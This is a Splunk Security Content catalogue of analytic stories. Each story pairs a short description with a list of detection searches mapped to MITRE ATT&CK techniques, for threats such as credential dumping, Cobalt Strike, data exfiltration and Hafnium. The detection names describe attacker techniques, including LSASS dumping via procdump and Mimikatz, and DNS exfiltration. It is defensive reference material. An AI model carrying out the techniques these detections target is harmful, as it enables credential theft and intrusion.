Splunk® Security Content

Analytic Stories

Acrobat logo Download manual as PDF


Acrobat logo Download topic as PDF

Splunk Security Content Analytic Story


All the Analytic Stories shipped to different Splunk products. Below is a breakdown by Category.

Abuse

Brand monitoring

Detect and investigate activity that may indicate that an adversary is using faux domains to mislead users into interacting with malicious infrastructure. Monitor DNS, email, and web traffic for permutations of your brand name.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Email, Web
  • Last Updated: 2017-12-19
  • Use Case: Advanced Threat Detection

Dns amplification attacks

DNS poses a serious threat as a Denial of Service (DOS) amplifier, if it responds to `ANY` queries. This Analytic Story can help you detect attackers who may be abusing your company's DNS infrastructure to launch amplification attacks, causing Denial of Service to other victims.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Network_Resolution
  • Last Updated: 2016-09-13
  • Use Case: Security Monitoring

Detection Profile

name ID Technique Tactic Type
Large Volume of DNS ANY Queries

T1498.002

Reflection Amplification

Impact

Anomaly

Kill Chain Phase

  • Actions on Objectives


Reference


version: 1


Data protection

Fortify your data-protection arsenal--while continuing to ensure data confidentiality and integrity--with searches that monitor for and help you investigate possible signs of data exfiltration.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Network_Resolution
  • Last Updated: 2017-09-14
  • Use Case: Security Monitoring

Netsh abuse

Detect activities and various techniques associated with the abuse of `netsh.exe`, which can disable local firewall settings or set up a remote connection to a host from an infected system.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2017-01-05
  • Use Case: Advanced Threat Detection


Adversary Tactics

Active directory discovery

Monitor for activities and techniques associated with Discovery and Reconnaissance within with Active Directory environments.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-08-20
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
AdsiSearcher Account Discovery

T1087.002, T1482, T1018, T1069.002, T1201, T1069.001, T1033, T1087.001, T1049

Domain Account, Domain Trust Discovery, Remote System Discovery, Domain Groups, Password Policy Discovery, Local Groups, System Owner/User Discovery, Local Account, System Network Connections Discovery

Discovery, Discovery, Discovery, Discovery, Discovery, Discovery, Discovery, Discovery, Discovery

TTP
DSQuery Domain Discovery

T1482, T1018

Domain Trust Discovery, Remote System Discovery

Discovery, Discovery

TTP
Domain Account Discovery With Net App

T1087.002

Domain Account

Discovery

TTP
Domain Account Discovery with Dsquery

T1087.002

Domain Account

Discovery

Hunting
Domain Account Discovery with Wmic

T1087.002

Domain Account

Discovery

TTP
Domain Controller Discovery with Nltest

T1018

Remote System Discovery

Discovery

TTP
Domain Controller Discovery with Wmic

T1018

Remote System Discovery

Discovery

Hunting
Domain Group Discovery With Dsquery

T1069.002

Domain Groups

Discovery

Hunting
Domain Group Discovery With Net

T1069.002

Domain Groups

Discovery

Hunting
Domain Group Discovery With Wmic

T1069.002

Domain Groups

Discovery

Hunting
Domain Group Discovery with Adsisearcher

T1069.002

Domain Groups

Discovery

TTP
Elevated Group Discovery With Net

T1069.002

Domain Groups

Discovery

TTP
Elevated Group Discovery With Wmic

T1069.002

Domain Groups

Discovery

TTP
Elevated Group Discovery with PowerView

T1069.002

Domain Groups

Discovery

Hunting
Get ADDefaultDomainPasswordPolicy with Powershell

T1201

Password Policy Discovery

Discovery

Hunting
Get ADDefaultDomainPasswordPolicy with Powershell Script Block

T1201

Password Policy Discovery

Discovery

Hunting
Get ADUser with PowerShell

T1087.002

Domain Account

Discovery

Hunting
Get ADUser with PowerShell Script Block

T1087.002

Domain Account

Discovery

Hunting
Get ADUserResultantPasswordPolicy with Powershell

T1201

Password Policy Discovery

Discovery

TTP
Get ADUserResultantPasswordPolicy with Powershell Script Block

T1201

Password Policy Discovery

Discovery

TTP
Get DomainPolicy with Powershell

T1201

Password Policy Discovery

Discovery

TTP
Get DomainPolicy with Powershell Script Block

T1201

Password Policy Discovery

Discovery

TTP
Get DomainUser with PowerShell

T1087.002

Domain Account

Discovery

TTP
Get DomainUser with PowerShell Script Block

T1087.002

Domain Account

Discovery

TTP
Get WMIObject Group Discovery

T1069.001

Local Groups

Discovery

Hunting
Get WMIObject Group Discovery with Script Block Logging

T1069.001

Local Groups

Discovery

Hunting
Get-DomainTrust with PowerShell

T1482

Domain Trust Discovery

Discovery

TTP
Get-DomainTrust with PowerShell Script Block

T1482

Domain Trust Discovery

Discovery

TTP
Get-ForestTrust with PowerShell

T1482

Domain Trust Discovery

Discovery

TTP
Get-ForestTrust with PowerShell Script Block

T1482

Domain Trust Discovery

Discovery

TTP
GetAdComputer with PowerShell

T1018

Remote System Discovery

Discovery

Hunting
GetAdComputer with PowerShell Script Block

T1018

Remote System Discovery

Discovery

Hunting
GetAdGroup with PowerShell

T1069.002

Domain Groups

Discovery

Hunting
GetAdGroup with PowerShell Script Block

T1069.002

Domain Groups

Discovery

Hunting
GetCurrent User with PowerShell

T1033

System Owner/User Discovery

Discovery

Hunting
GetCurrent User with PowerShell Script Block

T1033

System Owner/User Discovery

Discovery

Hunting
GetDomainComputer with PowerShell

T1018

Remote System Discovery

Discovery

TTP
GetDomainComputer with PowerShell Script Block

T1018

Remote System Discovery

Discovery

TTP
GetDomainController with PowerShell

T1018

Remote System Discovery

Discovery

Hunting
GetDomainController with PowerShell Script Block

T1018

Remote System Discovery

Discovery

TTP
GetDomainGroup with PowerShell

T1069.002

Domain Groups

Discovery

TTP
GetDomainGroup with PowerShell Script Block

T1069.002

Domain Groups

Discovery

TTP
GetLocalUser with PowerShell

T1087.001

Local Account

Discovery

Hunting
GetLocalUser with PowerShell Script Block

T1087.001

Local Account

Discovery

Hunting
GetNetTcpconnection with PowerShell

T1049

System Network Connections Discovery

Discovery

Hunting
GetNetTcpconnection with PowerShell Script Block

T1049

System Network Connections Discovery

Discovery

Hunting
GetWmiObject DS User with PowerShell

T1087.002

Domain Account

Discovery

TTP
GetWmiObject DS User with PowerShell Script Block

T1087.002

Domain Account

Discovery

TTP
GetWmiObject Ds Computer with PowerShell

T1018

Remote System Discovery

Discovery

TTP
GetWmiObject Ds Computer with PowerShell Script Block

T1018

Remote System Discovery

Discovery

TTP
GetWmiObject Ds Group with PowerShell

T1069.002

Domain Groups

Discovery

TTP
GetWmiObject Ds Group with PowerShell Script Block

T1069.002

Domain Groups

Discovery

TTP
GetWmiObject User Account with PowerShell

T1087.001

Local Account

Discovery

Hunting
GetWmiObject User Account with PowerShell Script Block

T1087.001

Local Account

Discovery

Hunting
Local Account Discovery With Wmic

T1087.001

Local Account

Discovery

Hunting
Local Account Discovery with Net

T1087.001

Local Account

Discovery

Hunting
NLTest Domain Trust Discovery

T1482

Domain Trust Discovery

Discovery

TTP
Net Localgroup Discovery

T1069.001

Local Groups

Discovery

Hunting
Network Connection Discovery With Arp

T1049

System Network Connections Discovery

Discovery

Hunting
Network Connection Discovery With Net

T1049

System Network Connections Discovery

Discovery

Hunting
Network Connection Discovery With Netstat

T1049

System Network Connections Discovery

Discovery

Hunting
Password Policy Discovery with Net

T1201

Password Policy Discovery

Discovery

Hunting
PowerShell Get LocalGroup Discovery

T1069.001

Local Groups

Discovery

Hunting
Powershell Get LocalGroup Discovery with Script Block Logging

T1069.001

Local Groups

Discovery

Hunting
Remote System Discovery with Adsisearcher

T1018

Remote System Discovery

Discovery

TTP
Remote System Discovery with Dsquery

T1018

Remote System Discovery

Discovery

Hunting
Remote System Discovery with Net

T1018

Remote System Discovery

Discovery

Hunting
Remote System Discovery with Wmic

T1018

Remote System Discovery

Discovery

TTP
System User Discovery With Query

T1033

System Owner/User Discovery

Discovery

Hunting
System User Discovery With Whoami

T1033

System Owner/User Discovery

Discovery

Hunting
User Discovery With Env Vars PowerShell

T1033

System Owner/User Discovery

Discovery

Hunting
User Discovery With Env Vars PowerShell Script Block

T1033

System Owner/User Discovery

Discovery

Hunting
Wmic Group Discovery

T1069.001

Local Groups

Discovery

Hunting

Kill Chain Phase

  • Exploitation
  • Reconnaissance


Reference


version: 1


Active directory password spraying

Monitor for activities and techniques associated with Password Spraying attacks within Active Directory environments.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-04-07
  • Use Case: Advanced Threat Detection

Bits jobs

Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-03-26
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
BITS Job Persistence

T1197, T1105

BITS Jobs, Ingress Tool Transfer

Defense Evasion, Persistence, Command And Control

TTP
BITSAdmin Download File

T1197, T1105

BITS Jobs, Ingress Tool Transfer

Defense Evasion, Persistence, Command And Control

TTP
PowerShell Start-BitsTransfer

T1197

BITS Jobs

Defense Evasion, Persistence

TTP

Kill Chain Phase

  • Exploitation


Reference


version: 1


Baron samedit cve-2021-3156

Uncover activity consistent with CVE-2021-3156. Discovered by the Qualys Research Team, this vulnerability has been found to affect sudo across multiple Linux distributions (Ubuntu 20.04 and prior, Debian 10 and prior, Fedora 33 and prior). As this vulnerability was committed to code in July 2011, there will be many distributions affected. Successful exploitation of this vulnerability allows any unprivileged user to gain root privileges on the vulnerable host.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2021-01-27
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Detect Baron Samedit CVE-2021-3156

T1068

Exploitation for Privilege Escalation

Privilege Escalation

TTP
Detect Baron Samedit CVE-2021-3156 Segfault

T1068

Exploitation for Privilege Escalation

Privilege Escalation

TTP
Detect Baron Samedit CVE-2021-3156 via OSQuery

T1068

Exploitation for Privilege Escalation

Privilege Escalation

TTP

Kill Chain Phase

  • Exploitation


Reference


version: 1


Cobalt strike

Cobalt Strike is threat emulation software. Red teams and penetration testers use Cobalt Strike to demonstrate the risk of a breach and evaluate mature security programs. Most recently, Cobalt Strike has become the choice tool by threat groups due to its ease of use and extensibility.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-02-16
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Anomalous usage of 7zip

T1560.001, T1059.003, T1543.003, T1055, T1071.002, T1218.010, T1218.005, T1569.002, T1027, T1218.011, T1053.005, T1548, T1203, T1505.003, T1127.001, T1036.003, T1127, T1071.001, T1018

Archive via Utility, Windows Command Shell, Windows Service, Process Injection, File Transfer Protocols, Regsvr32, Mshta, Service Execution, Obfuscated Files or Information, Rundll32, Scheduled Task, Abuse Elevation Control Mechanism, Exploitation for Client Execution, Web Shell, MSBuild, Rename System Utilities, Trusted Developer Utilities Proxy Execution, Web Protocols, Remote System Discovery

Collection, Execution, Persistence, Privilege Escalation, Defense Evasion, Privilege Escalation, Command And Control, Defense Evasion, Defense Evasion, Execution, Defense Evasion, Defense Evasion, Execution, Persistence, Privilege Escalation, Privilege Escalation, Defense Evasion, Execution, Persistence, Defense Evasion, Defense Evasion, Defense Evasion, Command And Control, Discovery

Anomaly
CMD Echo Pipe - Escalation

T1059.003, T1543.003

Windows Command Shell, Windows Service

Execution, Persistence, Privilege Escalation

TTP
Cobalt Strike Named Pipes

T1055

Process Injection

Defense Evasion, Privilege Escalation

TTP
DLLHost with no Command Line Arguments with Network

T1055

Process Injection

Defense Evasion, Privilege Escalation

TTP
Detect Regsvr32 Application Control Bypass

T1218.010

Regsvr32

Defense Evasion

TTP
GPUpdate with no Command Line Arguments with Network

T1055

Process Injection

Defense Evasion, Privilege Escalation

TTP
Rundll32 with no Command Line Arguments with Network

T1218.011

Rundll32

Defense Evasion

TTP
SearchProtocolHost with no Command Line with Network

T1055

Process Injection

Defense Evasion, Privilege Escalation

TTP
Services Escalate Exe

T1548

Abuse Elevation Control Mechanism

Privilege Escalation, Defense Evasion

TTP
Suspicious DLLHost no Command Line Arguments

T1055

Process Injection

Defense Evasion, Privilege Escalation

TTP
Suspicious GPUpdate no Command Line Arguments

T1055

Process Injection

Defense Evasion, Privilege Escalation

TTP
Suspicious MSBuild Rename

T1127.001, T1036.003

MSBuild, Rename System Utilities

Defense Evasion, Defense Evasion

TTP
Suspicious Rundll32 StartW

T1218.011

Rundll32

Defense Evasion

TTP
Suspicious Rundll32 no Command Line Arguments

T1218.011

Rundll32

Defense Evasion

TTP
Suspicious SearchProtocolHost no Command Line Arguments

T1055

Process Injection

Defense Evasion, Privilege Escalation

TTP
Suspicious microsoft workflow compiler rename

T1127, T1036.003

Trusted Developer Utilities Proxy Execution, Rename System Utilities

Defense Evasion, Defense Evasion

Hunting
Suspicious msbuild path

T1127.001, T1036.003

MSBuild, Rename System Utilities

Defense Evasion, Defense Evasion

TTP

Kill Chain Phase

  • Actions on Objective
  • Actions on Objectives
  • Exploitation
  • Privilege Escalation


Reference


version: 1


Collection and staging

Monitor for and investigate activities--such as suspicious writes to the Windows Recycling Bin or email servers sending high amounts of traffic to specific hosts, for example--that may indicate that an adversary is harvesting and exfiltrating sensitive data.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint, Network_Traffic
  • Last Updated: 2020-02-03
  • Use Case: Security Monitoring

Detection Profile

name ID Technique Tactic Type
Detect Renamed 7-Zip

T1560.001, T1114.001, T1114.002, T1036

Archive via Utility, Local Email Collection, Remote Email Collection, Masquerading

Collection, Collection, Collection, Defense Evasion

Hunting
Detect Renamed WinRAR

T1560.001

Archive via Utility

Collection

Hunting
Email files written outside of the Outlook directory

T1114.001

Local Email Collection

Collection

TTP
Email servers sending high volume traffic to hosts

T1114.002

Remote Email Collection

Collection

Anomaly
Hosts receiving high volume of network traffic from email server

T1114.002

Remote Email Collection

Collection

Anomaly
Suspicious writes to windows Recycle Bin

T1036

Masquerading

Defense Evasion

TTP

Kill Chain Phase

  • Actions on Objectives
  • Exfiltration
  • Exploitation


Reference


version: 1


Command and control

Detect and investigate tactics, techniques, and procedures leveraged by attackers to establish and operate command and control channels. Implants installed by attackers on compromised endpoints use these channels to receive instructions and send data back to the malicious operators.

Detection Profile

name ID Technique Tactic Type
DNS Exfiltration Using Nslookup App

T1048, T1071.004, T1048.003, T1095, T1041, T1189, T1537, T1114.001, T1114, T1114.003, T1071.001

Exfiltration Over Alternative Protocol, DNS, Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol, Non-Application Layer Protocol, Exfiltration Over C2 Channel, Drive-by Compromise, Transfer Data to Cloud Account, Local Email Collection, Email Collection, Email Forwarding Rule, Web Protocols

Exfiltration, Command And Control, Exfiltration, Command And Control, Exfiltration, Initial Access, Exfiltration, Collection, Collection, Collection, Command And Control

TTP
DNS Query Length Outliers - MLTK

T1071.004

DNS

Command And Control

Anomaly
DNS Query Length With High Standard Deviation

T1048.003

Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol

Exfiltration

Anomaly
Detect Large Outbound ICMP Packets

T1095

Non-Application Layer Protocol

Command And Control

TTP
Detect Spike in blocked Outbound Traffic from your AWS Anomaly
Detect hosts connecting to dynamic domain providers

T1189

Drive-by Compromise

Initial Access

TTP
Excessive DNS Failures

T1071.004

DNS

Command And Control

Anomaly
Excessive Usage of NSLOOKUP App

T1048

Exfiltration Over Alternative Protocol

Exfiltration

Anomaly
Multiple Archive Files Http Post Traffic

T1048.003

Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol

Exfiltration

TTP
Plain HTTP POST Exfiltrated Data

T1048.003

Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol

Exfiltration

TTP
Prohibited Network Traffic Allowed

T1048

Exfiltration Over Alternative Protocol

Exfiltration

TTP
Protocol or Port Mismatch

T1048.003

Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol

Exfiltration

Anomaly
TOR Traffic

T1071.001

Web Protocols

Command And Control

TTP

Kill Chain Phase

  • Actions on Objectives
  • Command and Control
  • Delivery
  • Exfiltration
  • Exploitation


Reference


version: 1


Credential dumping

Uncover activity consistent with credential dumping, a technique wherein attackers compromise systems and attempt to obtain and exfiltrate passwords. The threat actors use these pilfered credentials to further escalate privileges and spread throughout a target environment. The included searches in this Analytic Story are designed to identify attempts to credential dumping.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2020-02-04
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Access LSASS Memory for Dump Creation

T1003.001, T1055, T1068, T1078, T1098, T1134, T1543, T1547, T1548, T1554, T1556, T1558, T1555, T1087, T1201, T1552, T1003, T1003.002, T1003.003, T1558.003, T1059.001

LSASS Memory, Process Injection, Exploitation for Privilege Escalation, Valid Accounts, Account Manipulation, Access Token Manipulation, Create or Modify System Process, Boot or Logon Autostart Execution, Abuse Elevation Control Mechanism, Compromise Client Software Binary, Modify Authentication Process, Steal or Forge Kerberos Tickets, Credentials from Password Stores, Account Discovery, Password Policy Discovery, Unsecured Credentials, OS Credential Dumping, Security Account Manager, NTDS, Kerberoasting, PowerShell

Credential Access, Defense Evasion, Privilege Escalation, Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation, Initial Access, Persistence, Defense Evasion, Privilege Escalation, Persistence, Privilege Escalation, Persistence, Privilege Escalation, Privilege Escalation, Defense Evasion, Persistence, Credential Access, Defense Evasion, Persistence, Credential Access, Credential Access, Discovery, Discovery, Credential Access, Credential Access, Credential Access, Credential Access, Credential Access, Execution

TTP
Applying Stolen Credentials via Mimikatz modules

T1055, T1068, T1078, T1098, T1134, T1543, T1547, T1548, T1554, T1556, T1558

Process Injection, Exploitation for Privilege Escalation, Valid Accounts, Account Manipulation, Access Token Manipulation, Create or Modify System Process, Boot or Logon Autostart Execution, Abuse Elevation Control Mechanism, Compromise Client Software Binary, Modify Authentication Process, Steal or Forge Kerberos Tickets

Defense Evasion, Privilege Escalation, Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation, Initial Access, Persistence, Defense Evasion, Privilege Escalation, Persistence, Privilege Escalation, Persistence, Privilege Escalation, Privilege Escalation, Defense Evasion, Persistence, Credential Access, Defense Evasion, Persistence, Credential Access

TTP
Applying Stolen Credentials via PowerSploit modules

T1055, T1068, T1078, T1098, T1134, T1543, T1547, T1548, T1554, T1555, T1558

Process Injection, Exploitation for Privilege Escalation, Valid Accounts, Account Manipulation, Access Token Manipulation, Create or Modify System Process, Boot or Logon Autostart Execution, Abuse Elevation Control Mechanism, Compromise Client Software Binary, Credentials from Password Stores, Steal or Forge Kerberos Tickets

Defense Evasion, Privilege Escalation, Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation, Initial Access, Persistence, Defense Evasion, Privilege Escalation, Persistence, Privilege Escalation, Persistence, Privilege Escalation, Privilege Escalation, Defense Evasion, Persistence, Credential Access, Credential Access

TTP
Assessment of Credential Strength via DSInternals modules

T1078, T1098, T1087, T1201, T1552, T1555

Valid Accounts, Account Manipulation, Account Discovery, Password Policy Discovery, Unsecured Credentials, Credentials from Password Stores

Defense Evasion, Persistence, Privilege Escalation, Initial Access, Persistence, Discovery, Discovery, Credential Access, Credential Access

TTP
Attempted Credential Dump From Registry via Reg exe

T1003

OS Credential Dumping

Credential Access

TTP
Attempted Credential Dump From Registry via Reg exe

T1003.002, T1197, T1105, T1218.003, T1055, T1490, T1003.001, T1021.002, T1020, T1569.002, T1486, T1548.002

Security Account Manager, BITS Jobs, Ingress Tool Transfer, CMSTP, Process Injection, Inhibit System Recovery, LSASS Memory, SMB/Windows Admin Shares, Automated Exfiltration, Service Execution, Data Encrypted for Impact, Bypass User Account Control

Credential Access, Defense Evasion, Persistence, Command And Control, Defense Evasion, Defense Evasion, Privilege Escalation, Impact, Credential Access, Lateral Movement, Exfiltration, Execution, Impact, Privilege Escalation, Defense Evasion

TTP
Create Remote Thread into LSASS

T1003.001

LSASS Memory

Credential Access

TTP
Creation of Shadow Copy

T1003.003

NTDS

Credential Access

TTP
Creation of Shadow Copy with wmic and powershell

T1003.003

NTDS

Credential Access

TTP
Creation of lsass Dump with Taskmgr

T1003.001

LSASS Memory

Credential Access

TTP
Credential Dumping via Copy Command from Shadow Copy

T1003.003

NTDS

Credential Access

TTP
Credential Dumping via Symlink to Shadow Copy

T1003.003

NTDS

Credential Access

TTP
Credential Extraction indicative of FGDump and CacheDump with s option

T1003

OS Credential Dumping

Credential Access

TTP
Credential Extraction indicative of FGDump and CacheDump with v option

T1003

OS Credential Dumping

Credential Access

TTP
Credential Extraction indicative of Lazagne command line options

T1003, T1555

OS Credential Dumping, Credentials from Password Stores

Credential Access, Credential Access

TTP
Credential Extraction indicative of use of DSInternals credential conversion modules

T1003

OS Credential Dumping

Credential Access

TTP
Credential Extraction indicative of use of DSInternals modules

T1003

OS Credential Dumping

Credential Access

TTP
Credential Extraction indicative of use of Mimikatz modules

T1003

OS Credential Dumping

Credential Access

TTP
Credential Extraction indicative of use of PowerSploit modules

T1003

OS Credential Dumping

Credential Access

TTP
Credential Extraction native Microsoft debuggers peek into the kernel

T1003

OS Credential Dumping

Credential Access

TTP
Credential Extraction native Microsoft debuggers via z command line option

T1003

OS Credential Dumping

Credential Access

TTP
Credential Extraction via Get-ADDBAccount module present in PowerSploit and DSInternals

T1003

OS Credential Dumping

Credential Access

TTP
Detect Copy of ShadowCopy with Script Block Logging

T1003.002

Security Account Manager

Credential Access

TTP
Detect Credential Dumping through LSASS access

T1003.001

LSASS Memory

Credential Access

TTP
Detect Dump LSASS Memory using comsvcs

T1003.003

NTDS

Credential Access

TTP
Detect Kerberoasting

T1558.003

Kerberoasting

Credential Access

TTP
Detect Mimikatz Using Loaded Images

T1003.001

LSASS Memory

Credential Access

TTP
Dump LSASS via comsvcs DLL

T1003.001

LSASS Memory

Credential Access

TTP
Dump LSASS via procdump

T1003.001

LSASS Memory

Credential Access

TTP
Esentutl SAM Copy

T1003.002

Security Account Manager

Credential Access

Hunting
Extraction of Registry Hives

T1003.002

Security Account Manager

Credential Access

TTP
Ntdsutil Export NTDS

T1003.003

NTDS

Credential Access

TTP
SAM Database File Access Attempt

T1003.002

Security Account Manager

Credential Access

Hunting
SecretDumps Offline NTDS Dumping Tool

T1003.003

NTDS

Credential Access

TTP
Set Default PowerShell Execution Policy To Unrestricted or Bypass

T1059.001

PowerShell

Execution

TTP

Kill Chain Phase

  • Actions on Objectives
  • Exploitation
  • Installation
  • Lateral Movement
  • Privilege Escalation


Reference


version: 3


Dns hijacking

Secure your environment against DNS hijacks with searches that help you detect and investigate unauthorized changes to DNS records.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Network_Resolution
  • Last Updated: 2020-02-04
  • Use Case: Advanced Threat Detection

Data exfiltration

The stealing of data by an adversary.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint, Network_Traffic
  • Last Updated: 2020-10-21
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
DNS Exfiltration Using Nslookup App

T1048, T1071.004, T1048.003, T1095, T1041, T1189, T1537, T1114.001, T1114, T1114.003, T1071.001

Exfiltration Over Alternative Protocol, DNS, Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol, Non-Application Layer Protocol, Exfiltration Over C2 Channel, Drive-by Compromise, Transfer Data to Cloud Account, Local Email Collection, Email Collection, Email Forwarding Rule, Web Protocols

Exfiltration, Command And Control, Exfiltration, Command And Control, Exfiltration, Initial Access, Exfiltration, Collection, Collection, Collection, Command And Control

TTP
Detect SNICat SNI Exfiltration

T1041

Exfiltration Over C2 Channel

Exfiltration

TTP
Detect shared ec2 snapshot

T1537

Transfer Data to Cloud Account

Exfiltration

TTP
Excessive Usage of NSLOOKUP App

T1048

Exfiltration Over Alternative Protocol

Exfiltration

Anomaly
Mailsniper Invoke functions

T1114.001

Local Email Collection

Collection

TTP
Multiple Archive Files Http Post Traffic

T1048.003

Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol

Exfiltration

TTP
O365 PST export alert

T1114

Email Collection

Collection

TTP
O365 Suspicious Admin Email Forwarding

T1114.003

Email Forwarding Rule

Collection

Anomaly
O365 Suspicious User Email Forwarding

T1114.003

Email Forwarding Rule

Collection

Anomaly
Plain HTTP POST Exfiltrated Data

T1048.003

Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol

Exfiltration

TTP

Kill Chain Phase

  • Actions on Objective
  • Actions on Objectives
  • Exfiltration
  • Exploitation


Reference


version: 1


Deobfuscate-decode files or information

Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-03-24
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
CertUtil With Decode Argument

T1140

Deobfuscate/Decode Files or Information

Defense Evasion

TTP

Kill Chain Phase

  • Exploitation


Reference


version: 1


Detect zerologon attack

Uncover activity related to the execution of Zerologon CVE-2020-11472, a technique wherein attackers target a Microsoft Windows Domain Controller to reset its computer account password. The result from this attack is attackers can now provide themselves high privileges and take over Domain Controller. The included searches in this Analytic Story are designed to identify attempts to reset Domain Controller Computer Account via exploit code remotely or via the use of tool Mimikatz as payload carrier.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2020-09-18
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Detect Computer Changed with Anonymous Account

T1210, T1003.001, T1190

Exploitation of Remote Services, LSASS Memory, Exploit Public-Facing Application

Lateral Movement, Credential Access, Initial Access

Hunting
Detect Credential Dumping through LSASS access

T1003.001

LSASS Memory

Credential Access

TTP
Detect Mimikatz Using Loaded Images

T1003.001

LSASS Memory

Credential Access

TTP
Detect Zerologon via Zeek

T1190

Exploit Public-Facing Application

Initial Access

TTP

Kill Chain Phase

  • Actions on Objectives
  • Exploitation


Reference


version: 1


Disabling security tools

Looks for activities and techniques associated with the disabling of security tools on a Windows system, such as suspicious `reg.exe` processes, processes launching netsh, and many others.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2020-02-04
  • Use Case: Security Monitoring

Detection Profile

name ID Technique Tactic Type
Attempt To Add Certificate To Untrusted Store

T1553.004, T1562.001, T1562.004, T1543.003, T1112

Install Root Certificate, Disable or Modify Tools, Disable or Modify System Firewall, Windows Service, Modify Registry

Defense Evasion, Defense Evasion, Defense Evasion, Persistence, Privilege Escalation, Defense Evasion

TTP
Attempt To Stop Security Service

T1562.001

Disable or Modify Tools

Defense Evasion

TTP
Processes launching netsh

T1562.004

Disable or Modify System Firewall

Defense Evasion

TTP
Sc exe Manipulating Windows Services

T1543.003

Windows Service

Persistence, Privilege Escalation

TTP
Suspicious Reg exe Process

T1112

Modify Registry

Defense Evasion

TTP
Unload Sysmon Filter Driver

T1562.001

Disable or Modify Tools

Defense Evasion

TTP

Kill Chain Phase

  • Actions on Objectives
  • Installation


Reference


version: 2


Domain trust discovery

Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-03-25
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
DSQuery Domain Discovery

T1482, T1018

Domain Trust Discovery, Remote System Discovery

Discovery, Discovery

TTP
NLTest Domain Trust Discovery

T1482

Domain Trust Discovery

Discovery

TTP
Windows AdFind Exe

T1018

Remote System Discovery

Discovery

TTP

Kill Chain Phase

  • Exploitation


Reference


version: 1


F5 tmui rce cve-2020-5902

Uncover activity consistent with CVE-2020-5902. Discovered by Positive Technologies researchers, this vulnerability affects F5 BIG-IP, BIG-IQ. and Traffix SDC devices (vulnerable versions in F5 support link below). This vulnerability allows unauthenticated users, along with authenticated users, who have access to the configuration utility to execute system commands, create/delete files, disable services, and/or execute Java code. This vulnerability can result in full system compromise.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2020-08-02
  • Use Case: Advanced Threat Detection

Hafnium group

HAFNIUM group was identified by Microsoft as exploiting 4 Microsoft Exchange CVEs in the wild - CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint, Network_Traffic
  • Last Updated: 2021-03-03
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Any Powershell DownloadString

T1059.001, T1505.003, T1136.001, T1021.002, T1569.002, T1003.001, T1114.002, T1003.003, T1190

PowerShell, Web Shell, Local Account, SMB/Windows Admin Shares, Service Execution, LSASS Memory, Remote Email Collection, NTDS, Exploit Public-Facing Application

Execution, Persistence, Persistence, Lateral Movement, Execution, Credential Access, Collection, Credential Access, Initial Access

TTP
Detect Exchange Web Shell

T1505.003, T1190, T1059.001

Web Shell, Exploit Public-Facing Application, PowerShell

Persistence, Initial Access, Execution

TTP
Detect New Local Admin account

T1136.001

Local Account

Persistence

TTP
Detect PsExec With accepteula Flag

T1021.002

SMB/Windows Admin Shares

Lateral Movement

TTP
Detect Renamed PSExec

T1569.002

Service Execution

Execution

Hunting
Dump LSASS via comsvcs DLL

T1003.001

LSASS Memory

Credential Access

TTP
Dump LSASS via procdump

T1003.001

LSASS Memory

Credential Access

TTP
Email servers sending high volume traffic to hosts

T1114.002
